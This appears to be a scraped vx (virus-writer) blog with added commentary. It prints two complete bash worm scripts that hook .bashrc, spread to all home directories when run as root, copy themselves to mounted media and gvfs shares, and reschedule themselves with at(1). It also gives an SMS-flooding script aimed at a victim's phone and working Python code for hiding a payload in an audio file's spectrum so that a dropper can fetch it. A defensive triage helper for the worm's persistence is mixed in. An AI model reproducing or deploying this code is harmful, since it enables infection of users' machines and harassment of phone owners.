I have just discovered a nice tool called arss that lets you play with the spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could, for example, hide the virus code in the spectrum of an audio file, so the virus can be stored on an HTTP server and then downloaded (and extracted) by a dropper on the host system …
This way there is no suspicious traffic: all that crosses the wire is the download of an audio file.
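The encode/extract pair behind that idea, as an added example in plain Python (it is not arss and not code from this post): every byte becomes one frame of audio in which bit i is a pure tone on a fixed DFT bin, and the extractor reads the bits back with a single-bin DFT per frame. Because the tones sit exactly on bin frequencies they are orthogonal, so no bit leaks into another. The sample rate, frame length, bin choice and tone amplitude are assumptions of the example, and the payload b"badcow" is a constructed sample.

```python
"""Hide bytes in the spectrum of a WAV file and get them back (added example, not arss).

Each byte is one frame of FRAME samples; bit i of the byte is a tone at DFT bin BIT_BINS[i].
Sample rate, frame size, bins and amplitude are arbitrary choices made for this example.
"""
import cmath
import io
import math
import struct
import wave

SAMPLE_RATE = 8000                         # Hz (assumed)
FRAME = 256                                # samples per frame; one frame carries one byte
BIT_BINS = [8 + 4 * i for i in range(8)]   # bins 8..36 -> 250 Hz .. 1125 Hz at 8 kHz
TONE_AMPLITUDE = 0.1                       # per tone; eight tones peak at 0.8 of full scale


def encode_to_wav(payload: bytes) -> bytes:
    """Return a 16-bit mono PCM WAV whose spectrogram carries `payload`."""
    samples = []
    for byte in payload:
        for n in range(FRAME):
            x = 0.0
            for i, k in enumerate(BIT_BINS):
                if (byte >> i) & 1:
                    x += TONE_AMPLITUDE * math.sin(2 * math.pi * k * n / FRAME)
            samples.append(int(round(x * 32767)))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def bin_magnitude(frame, k: int) -> float:
    """Magnitude of DFT bin k of one frame (a single-bin DFT, no full FFT needed)."""
    return abs(sum(x * cmath.exp(-2j * math.pi * k * n / FRAME) for n, x in enumerate(frame)))


def decode_from_wav(wav_bytes: bytes) -> bytes:
    """Inverse of encode_to_wav: threshold each bit bin in every frame."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getnchannels() != 1 or w.getsampwidth() != 2:
            raise ValueError("expected 16-bit mono PCM")
        raw = w.readframes(w.getnframes())
    samples = struct.unpack("<%dh" % (len(raw) // 2), raw)
    # A tone of amplitude A on an exact bin gives |X[k]| = A * FRAME / 2; decide at half of that.
    threshold = TONE_AMPLITUDE * 32767 * FRAME / 4
    out = bytearray()
    for start in range(0, len(samples) - FRAME + 1, FRAME):
        frame = samples[start:start + FRAME]
        byte = 0
        for i, k in enumerate(BIT_BINS):
            if bin_magnitude(frame, k) > threshold:
                byte |= 1 << i
        out.append(byte)
    return bytes(out)


if __name__ == "__main__":
    wav = encode_to_wav(b"badcow")          # constructed sample payload
    print(len(wav), "bytes of WAV ->", decode_from_wav(wav))
```

The WAV round-trips bit-exactly; anything lossy in between (MP3 transcoding, resampling) would smear the tones and needs a more robust modulation. From the defender's side the lesson is the mirror image: the payload bytes never appear verbatim in the download, so the indicator is not the file but the process that fetches an audio file and then feeds it through FFT-like code before writing something executable.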
Hide virus in sounds …
January 3rd, 2010

Bash scripting 2
January 1st, 2010
I have improved the bash worm a bit; now it uses gvfs features too.
#!/bin/bash
# the badcow by WarGame

# persistence: hook the copy into .bashrc so it runs from every new interactive shell
if [ ! -f "$HOME/.badcow.sh" ];
then
    echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1

# running as root: plant the copy and the .bashrc hook in every home directory, then stop
if [ "$(id -u)" = "0" ];
then
    for dr_home in `ls /home`
    do
        if [ -d "/home/$dr_home" ];
        then
            if [ ! -f "/home/$dr_home/.badcow.sh" ];
            then
                echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
            fi
            cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
        fi
    done
    exit 0
fi

# try to spread using the gnome virtual filesystem (shares the user has mounted under ~/.gvfs)
if [ -d "$HOME/.gvfs" ];
then
    for vfs in `ls $HOME/.gvfs`
    do
        if [ -d "$HOME/.gvfs/$vfs" ];
        then
            cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
            chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
        fi
    done
fi

# re-schedule: remove every pending at(1) job of this user, then queue this script again in 10 minutes
for job in $(atq | awk '{print $1}' )
do
    atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1

# try to copy itself into the root of every mounted filesystem (removable media included)
for dr in $(mount | awk '{print $3}' )
do
    if [ -d "$dr" ];
    then
        cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
        chmod +x $dr/badcow.sh > /dev/null 2>&1
    fi
done
Bash scripting …
December 30th, 2009
I have just entered the world of bash scripting and this is my first experiment in the language:
#!/bin/bash
# the badcow

# persistence: hook the copy into .bashrc so it runs from every new interactive shell
if [ ! -f "$HOME/.badcow.sh" ];
then
    echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1

# running as root: plant the copy and the .bashrc hook in every home directory, then stop
if [ "$(id -u)" = "0" ];
then
    for dr_home in `ls /home`
    do
        if [ -d /home/$dr_home ];
        then
            if [ ! -f "/home/$dr_home/.badcow.sh" ];
            then
                echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
            fi
            cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
        fi
    done
    exit 0
fi

# re-schedule: remove every pending at(1) job of this user, then queue this script again in 10 minutes
for job in $(atq | awk '{print $1}' )
do
    atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1

# try to copy itself into the root of every mounted filesystem (removable media included)
for dr in $(mount | awk '{print $3}' )
do
    if [ -d $dr ];
    then
        cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
        chmod +x $dr/badcow.sh > /dev/null 2>&1
    fi
done
It is a simple example of a worm spreading via removable media under Linux (it works on FreeBSD too) … it is not very powerful because there is no autorun feature under Unix, so the copy dropped on the medium has to be executed by the user.
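Both badcow versions above leave the same three footholds: a bare path appended to .bashrc, an at(1) job that re-queues the script every ten minutes, and a copy of badcow.sh at the root of every mount point (the second version adds shares under ~/.gvfs, which show up as mount points too). The triage helper below is an added example, not the worm's own code; it checks those three places on text you hand it (the contents of a .bashrc, the output of atq and of at -c, the output of mount, and a directory-listing function), so it runs offline. All SAMPLE_* inputs are constructed, and the file name badcow.sh is taken from the scripts above.

```python
"""Triage the persistence left by the badcow scripts: .bashrc hook, at(1) job, copies on mounts.

Added example, not the worm's code. Every input is passed in as text or as a function so the
checks run offline; the SAMPLE_* values are constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List

DROPPED_NAME = "badcow.sh"   # file name used by the scripts above; change for other families

# A .bashrc line consisting only of a path to a hidden *.sh in a home directory. Real rc files
# "source" or "." other files; a bare dotfile-script invocation is exactly the worm's hook.
BARE_HIDDEN_SCRIPT = re.compile(r"^\s*(?:\$HOME|~|/home/[^/\s]+)/\.[^/\s]+\.sh\s*$")
MOUNT_LINE = re.compile(r"^\S+ on (\S+) type (\S+)")   # "<dev> on <mountpoint> type <fs> (...)"


@dataclass(frozen=True)
class Finding:
    source: str   # where it was seen
    detail: str   # what was seen


def scan_rc(rc_text: str, source: str = "~/.bashrc") -> List[Finding]:
    """Flag bare hidden-script lines (the `echo $HOME/.badcow.sh >> $HOME/.bashrc` hook)."""
    return [
        Finding(source, f"line {n} runs hidden script {line.strip()}")
        for n, line in enumerate(rc_text.splitlines(), 1)
        if BARE_HIDDEN_SCRIPT.match(line)
    ]


def scan_atq(atq_text: str, job_bodies: Dict[str, str]) -> List[Finding]:
    """atq prints '<job> <date> <queue> <user>'; `at -c <job>` prints the queued script, which
    for `at -f $HOME/.badcow.sh` contains the worm body. job_bodies maps job id -> that text."""
    findings = []
    for line in atq_text.splitlines():
        if not line.strip():
            continue
        job = line.split(None, 1)[0]
        if DROPPED_NAME in job_bodies.get(job, ""):
            findings.append(Finding("atq", f"job {job} re-runs {DROPPED_NAME}"))
    return findings


def scan_mounts(mount_text: str, listdir: Callable[[str], Iterable[str]]) -> List[Finding]:
    """The worm copies itself to <mountpoint>/badcow.sh for every line of `mount`."""
    findings = []
    for line in mount_text.splitlines():
        m = MOUNT_LINE.match(line)
        if m and DROPPED_NAME in set(listdir(m.group(1))):
            findings.append(Finding(m.group(1), f"{DROPPED_NAME} at root of {m.group(2)} mount"))
    return findings


def triage(rc_text, atq_text, job_bodies, mount_text, listdir) -> List[Finding]:
    return scan_rc(rc_text) + scan_atq(atq_text, job_bodies) + scan_mounts(mount_text, listdir)


# --- constructed sample inputs: what the commands would print on an infected box ---
SAMPLE_BASHRC = """# ~/.bashrc
[ -z "$PS1" ] && return
alias ll='ls -l'
source ~/.bash_aliases
/home/alice/.badcow.sh
"""
SAMPLE_ATQ = "7\tMon Jan  4 10:10:00 2010 a alice\n"
SAMPLE_JOBS = {"7": "#!/bin/sh\n# atrun uid=1000 gid=1000\ncd /home/alice || exit 1\n"
                    "#!/bin/bash\n# the badcow\ncp $0 $HOME/.badcow.sh > /dev/null 2>&1\n"}
SAMPLE_MOUNT = """/dev/sda1 on / type ext4 (rw)
proc on /proc type proc (rw)
/dev/sdb1 on /media/usb type vfat (rw,nosuid)
"""
SAMPLE_LISTING = {"/": ["bin", "etc", "home", "badcow.sh"],
                  "/proc": ["1", "cpuinfo"],
                  "/media/usb": ["photos", "badcow.sh"]}


def sample_findings() -> List[Finding]:
    return triage(SAMPLE_BASHRC, SAMPLE_ATQ, SAMPLE_JOBS, SAMPLE_MOUNT,
                  lambda path: SAMPLE_LISTING.get(path, []))


if __name__ == "__main__":
    for f in sample_findings():
        print(f"{f.source}: {f.detail}")
```

On a live box the inputs are `cat ~/.bashrc`, `atq` plus `at -c <job>` for each id, `mount`, and `os.listdir`; the at job is the part that survives a simple deletion of the file, because the queued job carries its own copy of the script body, so cleanup means `atrm` of the job as well as removing the .bashrc line and the dropped copies.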
Wordpress remote admin password vulnerability
August 12th, 2009

Files for Ransom … or Not
July 24th, 2009

An old skool exploit :D
July 21st, 2009

Origami in PDF
July 11th, 2009
Origami is a tool that lets you insert JavaScript code inside PDF documents and do other nice things.
The PDF format can be abused a lot (as recent attacks show)!
Persistent bios infection
June 14th, 2009
Phrack #66 is out and it contains a very nice article about injecting your own code into the BIOS EEPROM.
You can read it here.
Yet another XSS worm
April 13th, 2009

Annoying stuff
April 11th, 2009
How to spend your time during a long journey:
# flood a victim telephone with random generated sms (for pys60, Python 2 on Symbian S60)
import messaging
import appuifw
import random

def rnd():
    # a random lowercase ASCII letter ('a' = 97 .. 'z' = 122)
    return random.randint(97, 97 + 25)

num = appuifw.query(u"telephone number?", "text")
cnt = appuifw.query(u"how many?", "number")
while cnt > 0:
    # five random letters per message
    testo = chr(rnd()) + chr(rnd()) + chr(rnd()) + chr(rnd()) + chr(rnd())
    messaging.sms_send(num, testo)
    cnt = cnt - 1
    print "sent: " + testo